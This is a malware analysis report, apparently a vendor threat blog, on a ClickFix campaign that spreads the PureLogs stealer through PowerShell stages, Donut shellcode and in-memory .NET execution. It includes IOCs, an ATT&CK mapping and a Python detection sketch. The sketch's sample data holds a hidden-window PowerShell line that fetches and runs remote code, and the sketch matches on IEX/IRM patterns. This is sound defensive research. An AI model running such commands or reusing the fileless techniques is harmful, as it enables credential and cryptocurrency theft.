This research analyzes a ClickFix-based malware campaign distributing the .NET-based PureLogs stealer through the spoofed licensing-themed website canndelta[.]com. Victims are socially engineered into executing malicious PowerShell commands, initiating a multi-stage infection chain involving staged PowerShell loaders, Donut shellcode, and in-memory .NET assembly execution.
The attack chain relies heavily on fileless execution techniques, including RWX memory allocation, dynamic API resolution through PEB traversal, and unmanaged-to-managed CLR execution using Donut loader functionality. These techniques significantly reduce on-disk artifacts and complicate traditional file-based detection.
Once executed, PureLogs performs extensive host reconnaissance and credential theft operations targeting Chromium browser data, Windows Credential Manager secrets, cryptocurrency wallets, password managers, SSH-related files, and browser session tokens. Analysis also identified references to MetaMask Snap plugins associated with multiple blockchain ecosystems, indicating cryptocurrency-focused theft objectives.
During dynamic analysis, the malware established outbound TCP-based command-and-control communication with attacker-controlled infrastructure to exfiltrate harvested data and receive runtime configuration information.

Fig: PureLogs Stealer Distributed Through Impersonation of Licensing Firm “Canndelta”.
Victims visiting canndelta[.]com are presented with a fake verification prompt leveraging the ClickFix social engineering technique. The page instructs users to execute a malicious PowerShell command using the Win+R dialog followed by Ctrl+V and Enter, bypassing traditional browser-based download prompts and reducing user suspicion.
The executed PowerShell command retrieves and executes a remote PowerShell payload directly in memory from attacker-controlled infrastructure hosted at 178.16.52.232.
The infection chain consists of multiple staged payloads designed to progressively deploy the final PureLogs stealer while minimizing on-disk artifacts.

Fig: Canndelta ClickFix Campaign Execution Flow
The first-stage PowerShell payload acts as a lightweight in-memory downloader responsible for retrieving and executing additional malicious content from remote infrastructure.
The script launches a hidden PowerShell instance with suppressed console output and executes attacker-supplied content directly via Invoke-Expression (IEX). The loader relies on staged remote execution rather than embedded payloads, allowing operators to dynamically modify downstream payload delivery.
Observed behaviors include:

Fig: Malicious PowerShell Downloader and Remote Code Execution
The second-stage PowerShell loader retrieves shellcode from remote infrastructure and executes it directly from memory without writing the payload to disk.
The script allocates executable memory using VirtualAlloc with PAGE_EXECUTE_READWRITE permissions, copies the downloaded shellcode into the allocated memory region, and initiates execution through CreateThread.
This execution model enables staged in-memory payload delivery while minimizing filesystem artifacts commonly monitored by endpoint security products.

Fig: In-Memory PowerShell Payload Loader Using RWX Memory Execution
Analysis of the shellcode revealed a 64-bit Donut-based loader responsible for transitioning execution from unmanaged shellcode into managed .NET execution.
The shellcode accesses the Process Environment Block (PEB) through gs:[0x60] to locate PEB_LDR_DATA and enumerate loaded modules dynamically. Export resolution is performed at runtime without relying on traditional import tables, reducing static analysis visibility.
The loader subsequently initializes the .NET runtime environment required to execute the PureLogs payload directly from memory.

Fig: Shellcode Resolving Loaded Modules via PEB LDR Traversal
During execution, the staged loader chain retrieved an additional PE payload from attacker-controlled infrastructure hosted at 158.94.208.104. The retrieved content contained a valid PE structure and was subsequently used in the in-memory execution chain associated with the PureLogs deployment process.

Fig: Donut Shellcode Downloading and Executing the Next-Stage PE Payload in Memory
The loader initializes the .NET CLR runtime using CLRCreateInstance and related COM interfaces before reconstructing the PureLogs assembly in memory through SAFEARRAY-based allocation routines.
The payload is executed using AppDomain.Load(), enabling fully memory-resident .NET execution without requiring the assembly to be written to disk.
This execution model complicates traditional file-based detection and allows the stealer to operate with minimal filesystem visibility.

Fig: In-Memory CLR Initialization Used for Fileless .NET Payload Execution
PureLogs performs host fingerprinting prior to credential collection and exfiltration. The malware enumerates usernames, environment variables, hardware identifiers, session context, and additional system metadata before packaging the information for transmission to the C2 server.

Fig: Malware’s System Fingerprinting Data in Memory

Fig: Exfiltration of Host Fingerprint Data
The malware targets browser-integrated cryptocurrency wallet data and related storage artifacts associated with multiple blockchain ecosystems.
Analysis identified references to MetaMask Snap modules including:
These artifacts indicate explicit targeting of cryptocurrency wallet extensions and blockchain-related browser storage.

Fig: MetaMask Snap/Plugin References Indicating Multi-Blockchain Wallet Targeting
PureLogs enumerates sensitive directories associated with cryptocurrency wallets, password managers, browser data, and SSH-related files.
Observed targets include:
The malware also creates temporary headless Chromium profiles to access browser credential stores and authenticated session data.

Fig: PureLogs Stealer Enumerating Wallets, Credentials, and Sensitive Application Data

Fig: Credential Harvesting Through Chromium Data Store Theft
The stealer accesses Windows Credential Manager storage paths to enumerate DPAPI-protected credential artifacts associated with saved authentication data.
Additional targeting of Microsoft Edge browser profiles enables theft of:

Fig: Targeting Windows Credential Manager and Edge Data
During dynamic analysis, the malware established outbound TCP communication with 91.92.243.161:3038 using TcpClient.Connect().
Configuration data associated with the C2 infrastructure was observed in obfuscated form and decrypted at runtime prior to communication establishment.

Fig: Runtime Decryption and Establishment of TCP-Based C2 Communication

Fig: Successful TCP Handshake Between Infected Host and C2 Server
Defenders should monitor for PowerShell processes running with hidden windows combined with outbound connections to IP-based infrastructure. Particular attention should be given to command lines containing Invoke-Expression (IEX) or Invoke-RestMethod (IRM), and to execution chains involving Win+R-initiated process trees.
Memory-based telemetry may reveal VirtualAlloc calls requesting PAGE_EXECUTE_READWRITE permissions followed by CreateThread execution originating from PowerShell processes.
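As an added example (not code from this report or from Gurucul), the following Python sketch turns the detection guidance above into a correlation rule: it groups constructed Sysmon-like process, memory, thread and network events by process id and flags a PowerShell process only when several chain indicators (an explorer.exe parent as seen for a Win+R launch, a hidden window, IEX/IRM in the command line, an RWX allocation followed by CreateThread, and a connection to a bare IP address) occur together. The event shape, field names and sample values are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample telemetry in a Sysmon-like shape (not taken from the report).
SAMPLE_EVENTS = [
    {"type": "process", "pid": 4321, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -c "iex (irm http://198.51.100.7/a)"'},
    {"type": "memalloc", "pid": 4321, "api": "VirtualAlloc", "protect": "PAGE_EXECUTE_READWRITE"},
    {"type": "thread", "pid": 4321, "api": "CreateThread"},
    {"type": "network", "pid": 4321, "dest": "203.0.113.9", "port": 3038},
    {"type": "process", "pid": 5555, "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell -File C:\\scripts\\backup.ps1"},
    {"type": "network", "pid": 5555, "dest": "updates.example.net", "port": 443},
]

IP_LITERAL = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
REMOTE_EXEC = re.compile(r"\b(?:iex|invoke-expression|irm|invoke-restmethod)\b", re.I)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)


def chain_reasons(events):
    """Return the list of ClickFix/PureLogs chain indicators seen in one process's events."""
    proc = next((e for e in events if e["type"] == "process"), None)
    if proc is None or not proc["image"].lower().endswith("powershell.exe"):
        return []
    reasons = []
    if proc["parent"].lower() == "explorer.exe":  # Win+R launches appear as explorer.exe children
        reasons.append("powershell.exe spawned by explorer.exe (Win+R style launch)")
    if HIDDEN_WINDOW.search(proc["cmdline"]):
        reasons.append("hidden window requested")
    if REMOTE_EXEC.search(proc["cmdline"]):
        reasons.append("IEX/IRM remote code execution in command line")
    rwx_seen = False
    for e in events:  # the RWX allocation must precede the thread creation to count
        if e["type"] == "memalloc" and e.get("protect") == "PAGE_EXECUTE_READWRITE":
            rwx_seen = True
        elif rwx_seen and e["type"] == "thread" and e.get("api") == "CreateThread":
            reasons.append("RWX allocation followed by CreateThread")
            break
    if any(e["type"] == "network" and IP_LITERAL.match(e["dest"]) for e in events):
        reasons.append("outbound connection to a bare IP address")
    return reasons


def find_alerts(events, threshold=3):
    """Group events by pid and return {pid: reasons} for processes at or above the threshold."""
    by_pid = defaultdict(list)
    for e in events:
        by_pid[e["pid"]].append(e)
    return {pid: r for pid, evs in by_pid.items() if len(r := chain_reasons(evs)) >= threshold}
```

The threshold keeps a lone hidden-window or IP-destination event from alerting on its own; only the stacked chain described in this report crosses it.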
Additional indicators include:
Organizations using the Gurucul SIEM platform can leverage behavioral analytics and cross-source telemetry correlation to identify this attack chain across PowerShell execution, abnormal memory allocation behavior, unmanaged CLR initialization, browser credential access, and suspicious outbound network communication. Correlating Win+R initiated PowerShell activity with RWX memory execution and subsequent TCP connections to external infrastructure can significantly improve detection fidelity for ClickFix-driven malware delivery campaigns.
Additionally, Gurucul SIEM detections can be enriched through:
| ATT&CK Tactic | Technique ID | Technique Name | Observed Activity |
|---|---|---|---|
| Initial Access | T1189 | Drive-by Compromise | Victims visit the fake canndelta[.]com website hosting the ClickFix lure. |
| User Execution | T1204.001 | User Execution: Malicious Link | Users are socially engineered into executing a malicious PowerShell command via Win+R and Ctrl+V. |
| Command and Scripting Interpreter | T1059.001 | PowerShell | Multiple PowerShell stages are used for payload download and execution. |
| Ingress Tool Transfer | T1105 | Ingress Tool Transfer | Stage payloads and Donut shellcode are downloaded from remote attacker-controlled servers. |
| Obfuscated Files or Information | T1027 | Obfuscated/Compressed Files and Information | Obfuscated variables and data are used to evade analysis. |
| Reflective Code Loading | T1620 | Reflective Code Loading | Donut-based in-memory assembly execution |
| System Information Discovery | T1082 | System Information Discovery | The malware collects environment details, usernames, hardware identifiers, and session information. |
| File and Directory Discovery | T1083 | File and Directory Discovery | PureLogs enumerates wallet directories, browser data, SSH keys, and credential locations. |
| Credentials from Password Stores | T1555 | Credentials from Password Stores | Targets Chromium browser credentials, password managers, and Windows Credential Manager. |
| Credentials from Web Browsers | T1555.003 | Credentials from Web Browsers | Harvests saved passwords, cookies, autofill data, and browser session tokens. |
| Exfiltration Over C2 Channel | T1041 | Exfiltration Over C2 Channel | Stolen information is transmitted over the established TCP C2 channel. |
| Application Layer Protocol | T1071 | Application Layer Protocol | HTTP and TCP protocols are used for staging payload delivery and C2 communication. |
| IOC (SHA-256) | Name |
|---|---|
| 0099deccd390e229895d0c508882632569f9533e42d33a675885ee7f4f5164f3 | Stage1.ps1 |
| 61b453cfedc6c67d9744b963bc3cabbee33f53606fdbf80da04bc3d4c93eb4fb | Stage2.ps1 |
| 9bb96fa6aee45120d14660506320932691310adef4353e684775f590a17c22fc | Donut Shellcode(Stage 3) |
| ac86d43aa69faf616e7d82732c2138edf7f6e239c05cfca3b85b820aa3f3ec5a | my_s.bin(Stage 4) |
| 670dfec73872afec18093e8425fb07cc8aab9f4a838995333419d0298c73a5a2 | PureLogs.exe(Stage 5) |
| Indicator | Type |
|---|---|
| hxxps://canndelta[.]com | URL |
| 178[.]16[.]52[.]232 | IP Address |
| hxxp://158[.]94[.]208[.]92 | URL |
| hxxp://158[.]94[.]208[.]104/x7GkP2mQ9zL4/my_new_l.bin | URL |
| hxxp://158[.]94[.]208[.]104/x7GkP2mQ9zL4/my_s.bin | URL |
Contributors: Abhishek Samdole, Pandurang Terkar, Rudra Pratap
